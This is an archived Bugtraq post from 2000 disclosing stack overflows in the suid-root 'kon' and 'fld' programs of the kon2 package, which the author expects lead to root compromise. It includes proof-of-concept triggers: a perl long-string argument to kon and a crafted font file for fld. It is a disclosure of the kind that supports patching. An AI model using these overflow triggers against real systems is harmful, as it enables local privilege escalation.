Bugtraq mailing list archives
Problems with "kon2" package
From: chris () FERRET LMH OX AC UK (Chris Evans)
Date: Mon, 19 Jun 2000 23:51:53 +0100
Hi, I had reason to investigate the security of a package called "kon2" - a program for displaying Japanese on the console I'm led to believe. SUMMARY ======= kon2-0.3.9 In the version I briefly examined, there were three suid-root execuatbles - kon - fld - newvc Here are details of breakages in "kon" and "fld". I believe both lead to root compromise, although I haven't verified if something has dropped root privileges or not at the time of the overflows. DEMOS ===== No discussion of code flaws today, because boring stack overflows are being used 1) kon kon VGA -StartupMessage `perl -e 'print "A"x10000'` => segfault with EIP 0x41414141 2) fld a) Create file "read.me.and.die", contents: CHARSET_REGISTRY"AAAAAAAAAAAAAAAAAAA" CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA" CHARSET_ENCODING"AAAAAAAAAAAAAAAAAAA" ... BUT substitute each sequence of A's for 200 A's b) fld -t bdf read.me.and.die I don't get a clean 0x41414141 stacktrace but that's just a minor detail, and these things are always circumventable (I think a pointer gets toasted inbetween two char[] buffers on the stack) Cheers Chris
Current thread:
- Re: local root on linux 2.2.15, (continued)
- Re: local root on linux 2.2.15 Tollef Fog Heen (Jun 11)
- Re: local root on linux 2.2.15 Peter da Silva (Jun 15)
- Re: local root on linux 2.2.15 Firstname Lastname (Jun 15)
- Re: local root on linux 2.2.15 Robert Watson (Jun 18)
- Net Tools PKI server exploits Jim Stickley (Jun 19)
- XFree86: libICE DoS Chris Evans (Jun 19)
- XFree86: Various nasty libX11 holes Chris Evans (Jun 19)
- XFree86: xdm flaw; present in kdm Chris Evans (Jun 19)
- XFree86: xdm xdmcp code in wdm also Brian Russo (Jun 20)
- Re: XFree86: xdm xdmcp code in wdm also Jerome ALET (Jun 20)
- Re: local root on linux 2.2.15 Peter da Silva (Jun 15)
- Problems with "kon2" package Chris Evans (Jun 19)
- [TL-Security-Announce] Linux Kernel TLSA2000013-1 Roger Luethi (Jun 19)
- Re: [TL-Security-Announce] Linux Kernel TLSA2000013-1 Gregory Neil Shapiro (Jun 28)
- Re: local root on linux 2.2.15 Tollef Fog Heen (Jun 11)
- CERT Advisory CA-2000-12 Roman Drahtmueller (Jun 19)
- Re: local root on linux 2.2.15 Joseph Gooch (Jun 15)
- Conectiva Linux Security Announcement - ZOPE Sergio Bruder (Jun 16)